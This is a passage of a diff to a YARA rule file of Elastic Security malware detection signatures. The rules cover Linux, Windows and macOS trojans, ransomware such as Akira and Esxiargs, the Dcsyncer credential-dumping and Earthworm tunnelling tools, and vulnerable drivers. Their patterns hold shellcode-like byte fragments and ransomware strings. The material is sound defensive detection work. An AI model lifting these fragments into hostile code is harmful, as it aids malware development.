Linux Trojan Swrort (Linux.Trojan.Swrort)" author = "Elastic Security" - id = "351eeb76-ccca-40d5-8ee3-e8daf6494dda" + id = "22c2d6b6-d100-4310-87c4-3912a86bdd40" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Setag.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "3519d9e4bfa18c19b49d0fa15ef78151bd13db9614406c4569720d20830f3cbb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Swrort.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6df073767f48dd79f98e60aa1079f3ab0b89e4f13eedc1af3c2c073e5e235bbc" + logic_hash = "f661544d267a55feec786ab3d4fc4f002afa8e2b58833461f56b745ec65acfd4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c6edc7ae898831e9cc3c92fcdce4cd5b4412de061575e6da2f4e07776e0885f5" + fingerprint = "d2b16da002cb708cb82f8b96c7d31f15c9afca69e89502b1970758294e91f9a4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -69977,57 +70241,59 @@ rule ELASTIC_Linux_Trojan_Setag_351Eeb76 : FILE MEMORY os = "linux" strings: - $a = { 04 8B 45 F8 C1 E0 02 01 C2 8B 45 EC 89 02 8D 45 F8 FF 00 8B } + $a = { 31 DB F7 E3 53 43 53 6A 02 89 E1 B0 66 CD 80 51 6A 04 54 6A 02 } condition: all of them } -rule ELASTIC_Linux_Trojan_Setag_01E2F79B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Carberp_D6De82Ae : FILE MEMORY { meta: - description = "Detects Linux Trojan Setag (Linux.Trojan.Setag)" + description = "Identifies VNC module from the leaked Carberp source code. This could exist in other malware families." author = "Elastic Security" - id = "01e2f79b-fcbc-41d0-a68b-3a692b893f26" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Setag.yar#L20-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5b5e8486174026491341a750f6367959999bbacd3689215f59a62dbb13a45fcc" - logic_hash = "1e0336760f364acbbe0e8aec10bc7bfb48ed7e33cde56d8914617664cb93fd9b" + id = "d6de82ae-9846-40cb-925d-e0a371e1c44c" + date = "2021-02-07" + modified = "2021-08-23" + reference = "https://github.com/m0n0ph1/malware-1/blob/master/Carberp%20Botnet/source%20-%20absource/pro/all%20source/hvnc_dll/HVNC%20Lib/vnc/xvnc.h#L342" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Carberp.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f98fadb6feab71930bd5c08e85153898d686cc96c84fe349c00bf6d482de9b53" + logic_hash = "085020755c77b299b2bfd18b34af6c68450c29de67b8ae32ddf2b26299b923ae" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "4ea87a6ccf907babdebbbb07b9bc32a5437d0213f1580ea4b4b3f44ce543a5bd" + fingerprint = "7ce34f1000749a938b78508c93371d3339cd49f73eeec36b25da13c9d129b85c" + threat_name = "Windows.Trojan.Carberp" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0C 8B 45 EC 89 45 FC 8D 55 E8 83 EC 04 8D 45 F8 50 8D 45 FC } + $a1 = ".NET CLR Networking_Perf_Library_Lock_PID_0" ascii wide fullword + $a2 = "FakeVNCWnd" ascii wide fullword condition: all of them } -rule ELASTIC_Linux_Ransomware_Esxiargs_75A8Ec04 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Merlin_Bbad69B8 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Esxiargs (Linux.Ransomware.Esxiargs)" + description = "Detects Linux Trojan Merlin (Linux.Trojan.Merlin)" author = "Elastic Security" - id = "75a8ec04-c41d-4702-94fa-976870762aaf" - date = "2023-02-09" - modified = "2024-02-13" + id = "bbad69b8-e8fc-43ce-a620-793c059536fd" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Esxiargs.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "11b1b2375d9d840912cfd1f0d0d04d93ed0cddb0ae4ddb550a5b62cd044d6b66" - logic_hash = "7316cab75c1bcf41ae6c96afa41ef96c37ab1bb679f36a0cc1dd08002a357165" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Merlin.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d9955487f7d08f705e41a5ff848fb6f02d6c88286a52ec837b7b555fb422d1b6" + logic_hash = "e18079c9f018dc8d7f2fdf5c950b405f9f84ad2a5b18775dbef829fe1cb770c3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "279259c7ca41331b09842c2221139d249d6dfe2e2cb6b27eb50af7be75120ce4" + fingerprint = "594f385556978ef1029755cea53c3cf89ff4d6697be8769fe1977b14bbdb46d1" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70035,32 +70301,28 @@ rule ELASTIC_Linux_Ransomware_Esxiargs_75A8Ec04 : FILE MEMORY os = "linux" strings: - $s1 = "number of MB in encryption block" - $s2 = "number of MB to skip while encryption" - $s3 = "get_pk_data: key file is empty" - $s4 = { 6F 70 65 6E 00 6C 73 65 65 6B 20 5B 65 6E 64 5D 00 6F 70 65 6E 5F 70 6B 5F 66 69 6C 65 } - $s5 = "[] [] []" + $a = { DA 31 C0 BB 1F 00 00 00 EB 12 0F B6 3C 13 40 88 3C 02 40 88 } condition: - 3 of them + all of them } -rule ELASTIC_Linux_Exploit_Intfour_0Ca45Cd3 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Merlin_C6097296 : FILE MEMORY { meta: - description = "Detects Linux Exploit Intfour (Linux.Exploit.Intfour)" + description = "Detects Linux Trojan Merlin (Linux.Trojan.Merlin)" author = "Elastic Security" - id = "0ca45cd3-089c-4d7f-9088-dc972c14bd9d" - date = "2021-01-12" - modified = "2021-09-16" + id = "c6097296-c518-4541-99b2-e2f6d3e4610b" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Intfour.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9d32c5447aa5182b4be66b7a283616cf531a2fd3ba3dde1bc363b24d8b22682f" - logic_hash = "088d8daa9ba4f53c8de229282ed8a7b30b1e567687e7807ac6c3df9524dabba9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Merlin.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d9955487f7d08f705e41a5ff848fb6f02d6c88286a52ec837b7b555fb422d1b6" + logic_hash = "f48ed7f19ab29633600fde4bfea274bf36e7f60d700c9806b334d38a51d28b92" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "8926a8cfd7f3adf29e399a945592063039b80dcc0545b133b453aaf198d31461" + fingerprint = "8496ec66e276304108184db36add64936500f1f0dd74120e03b78c64ac7b5ba1" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70068,28 +70330,29 @@ rule ELASTIC_Linux_Exploit_Intfour_0Ca45Cd3 : FILE MEMORY os = "linux" strings: - $a = { 6D 28 63 6F 64 65 2C 20 31 30 32 34 2C 20 26 6E 65 65 64 6C 65 } + $a = { 54 24 38 48 89 5C 24 48 48 85 C9 75 62 48 85 D2 75 30 48 89 9C 24 C8 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Servhelper_F4Dee200 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Dcsyncer_425579C5 : FILE MEMORY { meta: - description = "Detects Windows Trojan Servhelper (Windows.Trojan.ServHelper)" + description = "MGIxY2/05+FBDTur++++0OUs" author = "Elastic Security" - id = "f4dee200-5471-472b-a017-bfcc9c291cbe" - date = "2022-03-22" - modified = "2022-04-12" + id = "425579c5-496f-4e08-a7e3-bf56e622aa21" + date = "2021-09-15" + modified = "2022-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_ServHelper.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "05d183430a7afe16a3857fc4e87568fcc18518e108823c37eabf0514660aa17c" - logic_hash = "abab541ebddf36c05e351d506d4f978a30d8a44ff09233a667d62a1692dabe15" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Dcsyncer.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "af7dbc84efeb186006d75d095f54a266f59e6b2348d0c20591da16ae7b7d509a" + logic_hash = "b0330adf1d4420ddf1f302974d2e4179f52ab1c8dc2f294ddf52286d714e0463" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "24e49a0c72e665a03cea66614481665eea962a0c6b0a2f9d459866d8070ab456" + fingerprint = "f6a0c028323be41f6ec90af8a7ea8587fee6985ddefdbcdd24351cb615f756a2" + threat_name = "Windows.Hacktool.Dcsyncer" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70097,116 +70360,123 @@ rule ELASTIC_Windows_Trojan_Servhelper_F4Dee200 : FILE MEMORY os = "windows" strings: - $a = { 48 8B 45 78 48 63 4D 44 48 8B 55 48 4C 63 45 44 48 0F B7 44 48 FE 66 42 33 44 42 FE 66 89 45 42 48 8D 4D 28 48 0F B7 55 42 E8 ?? ?? ?? ?? 48 8B 4D 70 48 8B 55 28 E8 ?? ?? ?? ?? 83 45 44 01 83 EB 01 85 DB 75 ?? } - $b = { 39 5D ?? 0F 8F ?? ?? ?? ?? 2B D8 83 C3 01 48 8B 45 ?? 48 63 4D ?? 66 83 7C 48 ?? 20 72 ?? 48 8B 45 ?? 48 63 4D ?? 66 83 7C 48 ?? 7F 76 ?? 48 8B 45 ?? 48 63 4D ?? 48 0F B7 44 48 ?? 66 83 E8 08 66 83 F8 07 77 ?? B2 01 8B C8 80 E1 7F D3 E2 48 0F B6 05 ?? ?? ?? ?? 84 C2 0F 95 C0 EB ?? 33 C0 84 C0 74 ?? 83 45 ?? 01 } + $a1 = "[x] dcsync: Error in ProcessGetNCChangesReply" wide fullword + $a2 = "[x] getDCBind: RPC Exception 0x%08x (%u)" wide fullword + $a3 = "[x] getDomainAndUserInfos: DomainControllerInfo: 0x%08x (%u)" wide fullword + $a4 = "[x] ProcessGetNCChangesReply_decrypt: Checksums don't match (C:0x%08x - R:0x%08x)" wide fullword condition: any of them } -rule ELASTIC_Windows_Trojan_Servhelper_370C5287 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Vbox_3315863F : FILE { meta: - description = "Detects Windows Trojan Servhelper (Windows.Trojan.ServHelper)" + description = "Subject: innotek GmbH" author = "Elastic Security" - id = "370c5287-0e2f-4113-95b6-53d31671fa46" - date = "2022-03-24" - modified = "2022-04-12" + id = "3315863f-668c-47ec-86c7-85d50c3b97d9" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_ServHelper.yar#L22-L40" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "05d183430a7afe16a3857fc4e87568fcc18518e108823c37eabf0514660aa17c" - logic_hash = "8a2934c28efef6a5fed26dc88d074aee15b0869370c66f6a4d6eaedf070eaa9e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_VBox.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498" + logic_hash = "ba4e6a94516e36dcd6140b6732d959703e2c58a79add705b9260001ea26db738" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "a66134e9344cc5ba403fe0aad70e8a991c61582d6a5640c3b9e4a554374176a2" - severity = 100 + tags = "FILE" + fingerprint = "b0aea1369943318246f1601f823c72f92a0155791661dadc4c854827c295e4bf" + threat_name = "Windows.VulnDriver.VBox" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a = { 00 10 66 01 00 48 66 01 00 98 07 2B 00 50 66 01 00 95 66 01 } + $subject_name = { 06 03 55 04 03 [2] 69 6E 6E 6F 74 65 6B 20 47 6D 62 48 } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $subject_name } -rule ELASTIC_Linux_Hacktool_Earthworm_4De7B584 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Vbox_1B1C5Cd5 : FILE { meta: - description = "Detects Linux Hacktool Earthworm (Linux.Hacktool.Earthworm)" + description = "Name: VBoxDrv.sys, Version: 3.0.0.0" author = "Elastic Security" - id = "4de7b584-d25f-414b-bdd5-45f3672a62d8" - date = "2021-01-12" - modified = "2021-09-16" + id = "1b1c5cd5-23d3-4f1f-a396-3f2b18e28b64" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Earthworm.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9d61aabcf935121b4f7fc6b0d082d7d6c31cb43bf253a8603dd46435e66b7955" - logic_hash = "019b2504df192e673f96a86464bb5e8ba5e89190e51bfe7d702753f76c00b979" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_VBox.yar#L22-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22" + logic_hash = "5fcfffea021aee8d18172383df0e65f8c618fab545c800f1a7b659e8112c6c0f" score = 75 - quality = 73 - tags = "FILE, MEMORY" - fingerprint = "af2dc166ad5bbd3e312338a3932134c33c33c124551e7828eeef299d89419d21" - severity = 100 + quality = 75 + tags = "FILE" + fingerprint = "89dd35bb023ebc03c46c0e70ac975025921da289cb3374f2912fbb323c591bd9" + threat_name = "Windows.VulnDriver.VBox" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 73 6F 63 6B 73 64 20 2C 20 72 63 73 6F 63 6B 73 20 2C 20 72 73 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 56 00 42 00 6F 00 78 00 44 00 72 00 76 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Hacktool_Earthworm_E3Da43E2 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Rustbucket_E64F7A92 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Earthworm (Linux.Hacktool.Earthworm)" + description = "Detects Macos Trojan Rustbucket (MacOS.Trojan.RustBucket)" author = "Elastic Security" - id = "e3da43e2-1737-4c51-af6c-7c64d9cbfb07" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Earthworm.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "da0cffc4222d11825778fe4fa985fef2945caa0cc3b4de26af0a06509ebafb21" - logic_hash = "b129b7060b6af4ff2aae2678a455b969579132891fba44e4fdc2481a5437bdf9" - score = 60 - quality = 45 + id = "e64f7a92-e530-4d0b-8ecb-fe5756ad648c" + date = "2023-06-26" + modified = "2023-06-29" + reference = "https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_RustBucket.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747" + logic_hash = "bd6005d72faba6aaeebdcbd8c771995cbfc667faf01eb93825afe985954a47fc" + score = 75 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "fdf19096c6afc1c3be75fe4bb2935aca8ac915c97ad0ab3c2b87e803347cc460" + fingerprint = "f9907f46c345a874b683809f155691723e3a6df7c48f6f4e6eb627fb3dd7904d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 8D 20 FF FF FF 4C 89 C1 4C 8B 85 20 FF FF FF 49 D3 E0 4C 21 C7 48 83 } + $user_agent = "User-AgentMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" + $install_log = "/var/log/install.log" + $timestamp = "%Y-%m-%d %H:%M:%S" condition: all of them } -rule ELASTIC_Linux_Hacktool_Earthworm_82D5C4Cf : FILE MEMORY +rule ELASTIC_Linux_Trojan_Bish_974B4B47 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Earthworm (Linux.Hacktool.Earthworm)" + description = "Detects Linux Trojan Bish (Linux.Trojan.Bish)" author = "Elastic Security" - id = "82d5c4cf-ab96-4644-b1f3-2e95f1b49e7c" - date = "2021-01-12" + id = "974b4b47-38cf-4460-8ff3-e066e5c8a5fc" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Earthworm.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dc412d4f2b0e9ca92063a47adfb0657507d3f2a54a415619db5a7ccb59afb204" - logic_hash = "81f35293bd3dd0cfbbf67f036773e16625bb74e06320fa1fff5bc428ef2f3a43" - score = 60 - quality = 45 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Bish.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9171fd2bbe182f0a3cd35937f3ee0076c9358f52f5bc047498dd9e233ae11757" + logic_hash = "c5a7d036c89fe50626da51486d19ee731ad28cbc8d36def075d8f33a7b68961f" + score = 75 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "400342ab702de1a7ec4dd7e9b415b8823512f74a9abe578f08f7d79265bef385" + fingerprint = "8858f99934e367b7489d60bfaa74ab57e2ae507a8c06fb29693197792f6f5069" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70214,28 +70484,28 @@ rule ELASTIC_Linux_Hacktool_Earthworm_82D5C4Cf : FILE MEMORY os = "linux" strings: - $a = { 89 E5 48 83 EC 20 31 C0 89 C1 48 8D 55 F0 48 89 7D F8 48 8B } + $a = { 00 31 C0 31 DB 31 C9 B0 17 CD 80 31 C0 50 68 6E } condition: all of them } -rule ELASTIC_Linux_Hacktool_Earthworm_4Ec2Ec63 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Criscras_Fc505C1D : FILE MEMORY { meta: - description = "Detects Linux Hacktool Earthworm (Linux.Hacktool.Earthworm)" + description = "Detects Linux Exploit Criscras (Linux.Exploit.Criscras)" author = "Elastic Security" - id = "4ec2ec63-6b22-404f-a217-4e7d32bfbe9f" - date = "2021-01-12" + id = "fc505c1d-f77d-48cc-b8fe-7b24b9cc6a97" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Earthworm.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dc412d4f2b0e9ca92063a47adfb0657507d3f2a54a415619db5a7ccb59afb204" - logic_hash = "25f616c5440a48aef0f824cb6859e88787db4f42c1ec904a3d3bd72f3a64116e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Criscras.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7399f6b8fbd6d6c6fb56ab350c84910fe19cc5da67e4de37065ff3d4648078ab" + logic_hash = "4d84570c13c584fb7360e798df9f3e6039ee74fdb6ad597add0ea150e3deaa80" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1dfb594e369ca92a9e3f193499708c4992f6497ff1aa74ae0d6c2475a7e87641" + fingerprint = "bc5e980599c4c8fc3c9b560738d7187a0c91e2813c64b3ad0ff014230100c8d8" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70243,147 +70513,155 @@ rule ELASTIC_Linux_Hacktool_Earthworm_4Ec2Ec63 : FILE MEMORY os = "linux" strings: - $a = { 89 E5 48 83 EC 20 BA 04 00 00 00 48 8D 45 F0 48 89 7D F8 89 } + $a = { 0C 89 21 89 E3 31 C0 B0 0B CD 80 31 C0 FE C0 CD } condition: all of them } -rule ELASTIC_Linux_Hacktool_Infectionmonkey_6C84537B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Wineloader_13E8860A : FILE MEMORY { meta: - description = "Detects Linux Hacktool Infectionmonkey (Linux.Hacktool.Infectionmonkey)" + description = "Detects Windows Trojan Wineloader (Windows.Trojan.WineLoader)" author = "Elastic Security" - id = "6c84537b-6aa1-40d5-b14c-f78d7e67823d" - date = "2022-01-05" - modified = "2022-01-26" + id = "13e8860a-9d83-4ae6-b07e-20bb4037010c" + date = "2024-03-24" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Infectionmonkey.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d941943046db48cf0eb7f11e144a79749848ae6b50014833c5390936e829f6c3" - logic_hash = "24cb368040fffe2743d0361a955d45a62a95a31c1744f3de15089169e365bb89" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_WineLoader.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f5cb3234eff0dbbd653d5cdce1d4b1026fa9574ebeaf16aaae3d4e921b6a7f9d" + logic_hash = "c072abb73377ed59c0dd9fab25a4c84575ab9badbddfda1ed51e576e4e12fa82" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e9275f5fd8df389a4c99f69c09df1e3e515d8b958616e6d4d2c82d693deb4908" + fingerprint = "d21c6d97360deea724b94b8f65116f00c11625c5deb1bac0790a23ede6eaaac6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 75 14 8B 54 24 0C 83 FA FF 0F 44 D0 83 C4 1C 89 D0 C3 8D 74 } + $a1 = { 48 8B 1E 48 89 F1 E8 ?? ?? 00 00 48 8B 56 08 48 89 F9 49 89 D8 E8 ?? ?? FF FF 48 89 F1 E8 ?? 5C 00 00 90 48 81 C4 ?? 00 00 00 5B 5D 5F 5E 41 5C 41 5E 41 5F C3 C3 41 57 41 56 41 55 41 54 56 57 } + $a2 = { 85 C0 0F 84 ?? 03 00 00 4C 8D A4 24 BC 00 00 00 41 C7 04 24 04 00 00 00 B8 0F 00 00 00 48 8D 7C 24 70 48 89 47 F8 48 B8 } + $a3 = { 48 85 DB 0F 84 B3 00 00 00 83 BC 24 80 01 00 00 00 0F 84 5A 01 00 00 4C 8D 74 24 50 49 C7 46 F8 0D 00 00 00 48 B8 } condition: - all of them + any of them } -rule ELASTIC_Linux_Ransomware_Akira_02237952 : FILE MEMORY +rule ELASTIC_Macos_Backdoor_Kagent_64Ca1865 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Akira (Linux.Ransomware.Akira)" + description = "Detects Macos Backdoor Kagent (MacOS.Backdoor.Kagent)" author = "Elastic Security" - id = "02237952-b9ac-44e5-a32f-f3cc8f28a89b" - date = "2023-07-28" - modified = "2024-02-13" + id = "64ca1865-0a99-49dc-b138-02b17ed47f60" + date = "2021-11-11" + modified = "2022-07-22" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Akira.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1d3b5c650533d13c81e325972a912e3ff8776e36e18bca966dae50735f8ab296" - logic_hash = "a9b3cdddb3387251d7da90f32b08b9c1eedcdff1fe90d51f4732183666a6d467" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Backdoor_Kagent.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d599d7814adbab0f1442f5a10074e00f3a776ce183ea924abcd6154f0d068bb4" + logic_hash = "dea0a1bbe8c3065b395de50b5ffc2fbdf479ed35ce284fa33298d6ed55e960c6" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "7fcfac47be082441f6df149d0615a9d2020ac1e9023eabfcf10db4fe400cd474" + fingerprint = "b8086b08a019a733bee38cebdc4e25cdae9d3c238cfe7b341d8f0cd4db204d27" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a1 = "No path to encrypt" fullword - $a2 = "--encryption_percent" fullword - $a3 = "Failed to import public key" fullword - $a4 = "akira_readme.txt" fullword + $s1 = "save saveCaptureInfo" + $s2 = "savephoto success screenCaptureInfo" + $s3 = "no auto bbbbbaaend:%d path %s" + $s4 = "../screencapture/screen_capture_thread.cpp" + $s5 = "%s:%d, m_autoScreenCaptureQueue: %x" + $s6 = "auto bbbbbaaend:%d path %s" 